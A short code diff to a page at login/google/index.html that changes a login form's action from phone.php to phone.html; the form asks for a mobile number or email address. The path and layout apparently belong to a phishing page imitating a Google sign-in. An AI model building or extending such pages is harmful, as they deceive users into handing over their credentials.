--- a/login/google/index.html
+++ b/login/google/index.html
@@ -37,7 +37,7 @@
 			</br>
 			</br>
 			</br>
-			<form id="login-form"  action="phone.php" method="get"  >
+			<form id="login-form"  action="phone.html" method="get"  >
 				<div class="form-group">
 					<input type="text" name="username" id="email"  placeholder="Mobile number or email address" autocomplete="off" required>
 						</br>
